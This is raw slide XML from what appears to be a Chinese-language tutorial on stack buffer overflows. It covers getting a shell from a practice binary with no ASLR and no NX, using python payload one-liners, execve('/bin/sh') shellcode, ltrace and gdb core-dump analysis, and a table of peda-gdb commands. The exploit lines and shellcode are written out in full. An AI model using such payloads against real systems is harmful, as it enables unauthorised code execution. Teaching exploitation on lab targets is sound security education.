            <a:schemeClr val="accent6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6" name="linuxClassicAddressSpaceLayout.png" descr="linuxClassicAddressSpaceLayout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36846" y="1612580"/>
            <a:ext cx="6870525" cy="8513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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23304500" y="12909221"/>
            <a:ext cx="478070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211" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550463" y="1176890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Clr>
                <a:srgbClr val="FF2600"/>
              </a:buClr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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212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213" name="root@Ubuntu : tmp ➤ python -c &quot;print 'a'*13+'bbbb'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653967" y="5844213"/>
            <a:ext cx="19654166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python -c "print 'a'*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00FDFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13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+'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bbbb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'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"|ltrace -if ./easy </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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9793] [0x8048331] __libc_start_main(0x8048427, 1, 0xffffd634, 0x8048450 &lt;unfinished ...&gt;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9793] [0x804841d] gets(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd56f</a:t>
            </a:r>
            <a:r>
              <a:t>, 0xf7fc2000, 0xf7fc0244, 0xf7e280ec) = 0xffffd56f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9793] [0x62626262] --- SIGSEGV (Segmentation fault) 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9793] [0xffffffffffffffff] +++ killed by SIGSEGV +++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root@Ubuntu : tmp ➤ python -c &quot;print 'a'*13+'bbbb'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653967" y="5844213"/>
            <a:ext cx="19654166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python -c "print 'a'*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00FDFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13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+'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bbbb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'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"|ltrace -if ./easy </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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9793] [0x8048331] __libc_start_main(0x8048427, 1, 0xffffd634, 0x8048450 &lt;unfinished ...&gt;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9793] [0x804841d] gets(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd56f</a:t>
            </a:r>
            <a:r>
              <a:t>, 0xf7fc2000, 0xf7fc0244, 0xf7e280ec) = 0xffffd56f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9793] [0x62626262] --- SIGSEGV (Segmentation fault) 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9793] [0xffffffffffffffff] +++ killed by SIGSEGV +++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Address of shellcode?…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7006061" y="2619999"/>
            <a:ext cx="663170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</a:pPr>
            <a:r>
              <a:t>Address of shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd56f</a:t>
            </a:r>
            <a:r>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00FDFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4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=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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0xffffd580</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23304500" y="12909221"/>
            <a:ext cx="478070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218" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550463" y="1176890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Clr>
                <a:srgbClr val="FF2600"/>
              </a:buClr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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219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220" name="將EIP修改為該地址！"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7824782" y="5107304"/>
            <a:ext cx="8899536" cy="1367791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627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將EIP修改為該地址！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0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root@Ubuntu : tmp ➤ (python -c &quot;print 'a'*13+'\x80\xd5\xff\xff'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'&quot;;cat)|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653967" y="5844213"/>
            <a:ext cx="19654166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rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(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python -c "print 'a'*13+'\x80\xd5\xff\xff'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;cat)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|ltrace -if ./easy </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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9953] [0x8048331] __libc_start_main(0x8048427, 1, 0xffffd634, 0x8048450 &lt;unfinished ...&gt;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9953] [0x804841d] gets(0xffffd56f, 0xf7fc2000, 0xf7fc0244, 0xf7e280ec) = 0xffffd56f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[pid 9953] [0xf7dd7c30] --- Called exec() ---</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902450" y="10595778"/>
            <a:ext cx="9996984" cy="628155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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4" name="trick:(;cat)可以keep住io，因使用shellcode拿到的io在正常情況下會直接被close。"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16262350" y="2782203"/>
            <a:ext cx="7773988" cy="3234730"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49532"/>
              <a:gd name="adj2" fmla="val 68007"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF93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60947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>trick:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(;cat)</a:t>
            </a:r>
            <a:r>
              <a:t>可以keep住io，因使用shellcode拿到的io在正常情況下會直接被close。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="成功執行到shellcode"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9208090" y="4596438"/>
            <a:ext cx="8545920" cy="1367791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627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成功執行到shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23304500" y="12909221"/>
            <a:ext cx="478070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227" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550463" y="1176890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Clr>
                <a:srgbClr val="FF2600"/>
              </a:buClr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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228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5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練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550463" y="1176890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Clr>
                <a:srgbClr val="FF2600"/>
              </a:buClr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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="root@Ubuntu : tmp ➤ (python -c &quot;print 'a'*13+'\x80\xd5\xff\xff'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'&quot;;cat)|./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650891" y="5828029"/>
            <a:ext cx="19539172" cy="30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(python -c "print 'a'*13+'\x80\xd5\xff\xff'+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'";cat)|./easy </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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whoami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Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232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700" fill="hold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1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練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550463" y="1176890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Clr>
                <a:srgbClr val="FF2600"/>
              </a:buClr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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1235" name="你會發現這個payload在沒有ltrace的狀況下會無法執行，因為使用ltrace所分配到的stack與正常執行時不同。"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385837" y="5535929"/>
            <a:ext cx="11599625" cy="264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你會發現這個payload在沒有ltrace的狀況下會無法執行，因為使用ltrace所分配到的stack與正常執行時不同。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1236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5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Coredump"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="4758741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Coredump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="核心轉儲…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="7984183" cy="264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核心轉儲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linux核心及程式崩潰時觸發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會快照該程式的記憶體</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="root@Ubuntu : tmp ➤ ulimit -c…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941219" y="6031229"/>
            <a:ext cx="15627658" cy="30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rPr>
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ulimit -c</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0433FF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rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ulimit -c unlimited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rPr>
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /proc/sys/kernel/core_pattern </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF40FF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core</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="0為disable…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16868993" y="6043929"/>
            <a:ext cx="6561088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>
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>0為disable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Enable coredump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>快照的記憶體存放位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="用於分析程式崩潰原因…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715310" y="10652976"/>
            <a:ext cx="6730455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用於分析程式崩潰原因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gdb ./binary core </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243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eda-gdb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="4356458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Peda-gdb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="使用gdb修改之debugger…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="8598546" cy="326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使用gdb修改之debugger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動態分析程式行為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Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="216BA9"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="216BA9"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/longld/peda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1247" name="Screen Shot 2019-04-14 at 10.08.33 PM.png" descr="Screen Shot 2019-04-14 at 10.08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0477" y="6633209"/>
            <a:ext cx="18730346" cy="3266441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248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eda-gdb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="4356458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Peda-gdb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251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1252" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3445639" y="3902347"/>
          <a:ext cx="17492722" cy="99949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722986"/>
                <a:gridCol w="6356073"/>
                <a:gridCol w="7400962"/>
              </a:tblGrid>
              <a:tr h="66088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</a:rPr>
                        <a:t>指令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</a:rPr>
                        <a:t>說明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</a:rPr>
                        <a:t>範例</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="66088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vmmap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List 程式分配之 memory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vmmap</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="373654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x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List memory 內容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x/gx 64位元(8byte) x/wx 32位元(4byte)
x/10gx  x/10s 列出10個字串
x/10c 列出10個字元
x/10i $eip 列出10個當前指令</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="64817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執行程式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r</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="64817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b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設定中斷點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b *0x80474aa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="128364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List information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i r 列出暫存器資訊
i b 列出中斷點資訊</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="64817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find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於memory中尋找特定字元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find /bin/sh 0xf7e10000 0xf7fc0000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="565264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disas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List function decompiler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disas main</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="565264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Delete break point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d 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4" name="Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1255" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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6" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23357664" y="564820"/>
            <a:ext cx="36496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257" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="5167629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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="利用coredump取得crash當下的memory，並找到輸入的字串及shellcode位置。"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843481" y="5961379"/>
            <a:ext cx="11599626" cy="17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利用coredump取得crash當下的memory，並找到輸入的字串及shellcode位置。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="root@Ubuntu : tmp ➤ gdb ./easy core…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1869135" y="2278380"/>
            <a:ext cx="12907825" cy="915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gdb ./easy core </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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Core was generated by `./easy'.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Program terminated with signal SIGSEGV, Segmentation fault.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#0  0xffffd58f in ?? ()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EC9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[gdb]&gt;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i r</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumOff val="-10627"/>
                </a:schemeClr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eax            0x8048310	    0x8048310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ecx            0xff09	       0xff09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edx            0x0	0x0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ebx            0x8	0x8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esp            0xffffd710	   0xffffd710 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;-stack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ebp            0x7	0x7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esi            0x9	0x9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edi            0x5	0x5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eip            0xffffd58f	   0xffffd58f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eflags         0x10286	[ PF SF IF RF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cs             0x23	0x23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ss             0x2b	0x2b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ds             0x2b	0x2b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es             0x2b	0x2b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fs             0x0	0x0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gs             0x63	0x63</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1265" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1851339" y="1769345"/>
            <a:ext cx="13121218" cy="8881555"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13121217" cy="8881554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1263" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="2236234"/>
              <a:ext cx="13121219" cy="6645321"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="13121217" cy="6645320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1260" name="[gdb]&gt; find 0x61616161 0xffffd000 0xffffd710…"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="13121219" cy="5704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rgbClr val="4D2F2D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>
                    <a:solidFill>
                      <a:srgbClr val="EC9F00"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>[gdb]&gt; </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>find 0x61616161 0xffffd000 0xffffd710</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRP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Searching for '0x61616161' in range: 0xffffd000 - 0xffffd710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Found 3 results, display max 3 items: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easy : </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd57f</a:t>
                </a:r>
                <a:r>
                  <a:t> (popa)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easy : </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd583</a:t>
                </a:r>
                <a:r>
                  <a:t> (popa)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easy : </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd587</a:t>
                </a:r>
                <a:r>
                  <a:t> (popa)</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="4D2F2D"/>
                  </a:solidFill>
                </a:endParaRP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rgbClr val="4D2F2D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rgbClr val="4D2F2D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>
                    <a:solidFill>
                      <a:srgbClr val="EC9F00"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>[gdb]&gt; </a:t>
                </a:r>
                <a:r>
                  <a:rPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumOff val="-10627"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>x/20wx 0xffffd57f</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumOff val="-10627"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRP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>
                    <a:solidFill>
                      <a:srgbClr val="FF2600"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0xffffd57f</a:t>
                </a:r>
                <a:r>
                  <a:t>:	0x61616161	 0x61616161	 0x61616161	 0xffd58061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0xffffd58f:	0x50c031ff	 0x732f2f68	 0x622f6868	 0xe3896e69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0xffffd59f:	0xe1895350	 0x80cd0bb0	 0x00000000	 0xe2863700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0xffffd5af:	0x000001f7	 0xffd64400	 0xffd64cff	 0x000000ff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0xffffd5bf:	0x00000000	 0x00000000	 0xfc200000	 0xffdc04f7</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1261" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1201224" y="4042601"/>
                <a:ext cx="1" cy="1793241"/>
              </a:xfrm>
